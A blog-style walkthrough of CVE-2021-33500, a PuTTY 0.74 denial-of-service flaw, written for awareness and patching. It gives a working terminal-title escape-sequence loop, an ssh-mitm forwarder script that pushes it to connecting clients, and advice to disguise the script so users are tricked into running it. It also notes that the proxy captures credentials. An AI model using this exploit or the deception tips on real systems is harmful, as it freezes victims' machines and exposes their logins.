Putty denial of service

5 min readJun 10, 2021

Introduction

Putty is an open source SSH and telnet client that is widely available and utilized by many network administrators and students around the world. If you are reading this you probably used it in some form or another. Briefly or extensively, its uses are vast. Some of its uses are generating an SSH hash when connecting to remote machines and also transferring files through FTP.

This article will discuss CVE-2021–33500 which is a vulnerability that was discovered on Putty version 0.74. This would allow a remote machine to essentially cause a denial of service on the host machine that houses this version of Putty.

The exploit is rather simple: A remote machine executes a command that causes the Putty terminal to freeze by repeatedly changing the terminals title. This will lead to it freezing entirely and thus denying user(s) access to the machine whether it be a workstation or server.

Machine set up

In order to perform this vulnerability you will need two machines that with one being a Windows 10 machine with Putty version 0.74 installed. The attacking machine can be another Windows machine or a Linux machine. I would suggest using Kali Linux since it has a wide array of tools.

You can download Putty here. Here are also some links to download a Virtual Machine through either VMWare or Virtualbox.

The Windows 10 machine may need defender disabled in order for the payload to work although I was able to get this to function without it.

You will also need a tool called ssh-mitm which is a great pentesting tool for session hijacking amongst other things. This tool will create a proxy server to which the putty client will connect to and deploy the payload to cause the Windows 10 machine to freeze thus fulfilling the denial of service.

In order to install ssh-mitm you will need to first install the pip python package manager, although if you have Python 2 or Python 3 installed it should already be installed. You can always check by running the following command:

$ python -m pip --version
pip X.Y.Z from .../site-packages/pip (python X.Y)

If you need to install pip you can use this link to download it. You can also download it by using curl:

curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py

then running the following command to install:

python get-pip.py

Once you have finished installing pip you can then move onto installing the ssh-mitm tool by running the command:

$ python -m pip install ssh-mitm

Payload

A simple command in order to exploit this vulnerability is:

$ PS1=''
echo -ne "\033]0; NEW_TITLE \007"

The posted command will repeatedly change the terminal window. Thus you can run something like below:

$ PS1=''
while :
> do
> echo -ne "\033]0; NEW_TITLE${RANDOM}  \007"
> done

I searched around to get ideas for a payload to fit this CVE and was able to find the following script:

from ssh_proxy_server.forwarders.ssh import SSHForwarder


class SSHPuttyDoSForwarder(SSHForwarder):
    """PuTTY < 0.75: DoS on Windows/Linux clients

    Security fix: a server could DoS the whole Windows/Linux GUI by telling
    the PuTTY window to change its title repeatedly at high speed.

    PuTTY-Changelog: https://www.chiark.greenend.org.uk/~sgtatham/putty/changes.html
    """

    def __init__(self, session):
        super().__init__(session)
        self.exploit = [
            "PS1=''",
            "while :",
            "do",
            "echo -ne '\\033]0: NEW_TITLE${RANDOM} \\007'",
            "done"
        ]
        self.executed = False

    def forward_extra(self):
        if not self.executed:
            self.server_channel.sendall('\n'.join(self.exploit) + '\n')
            self.executed = True

I then modified the script to fit my scope and named it something obscure (which I would recommend you do).

Attack

Once you set up your machines the attack can proceed. On the attacking machine you will need to launch the ssh-mitm server:

Afterwards, we will need to launch the Windows 10 machine and run Putty to connect to the ssh-mitm machine, after you have connected you will receive a warning from Putty. We will need to select Yes to move forward on the connection:

The hostname is the IP of the machine that is to be connected to along with Port 10022 that is being listened on

Once the connection has been made you will see confirmation on the attacking machine. You can also see that by connecting through the ssh-mitm machine we also have the username and password recorded should it be needed later along with other important information. From here we could choose to run other various forms of attack such as session hijacking but we are going to have the putty client run the script here to lock up the windows machine.

This is just a sample, make sure to call this something more obtuse. We can trick the user into thinking this is a useful or needed file for example.

A mirror shell is also created when connection as you can see here:

Once created you will be able to navigate the terminal to the script

From here you can navigate to the location of your script and run it and then watch as your VM becomes unresponsive.

Remediation

So know we’ve gone through the attack but what about the remediation? Fortunately, this was caught on and the developers of Putty have released version 0.75 which corrects this issue and no longer allows this to function as I have tested this issue. I have also since updated my own version of Putty that I use professionally.

Final Thoughts

Putty is a simple and useful open source tool that can be used for diagnostics but in the hands of an adversary can be used to affect one of the pillars of the CIA triad: Availability. With this published CVE an attacker can include the installation of this software and cause systems to go offline. It is important that other professionals become aware of this and update their versions to avoid this since updating open source simple tools like this can so often become an after thought.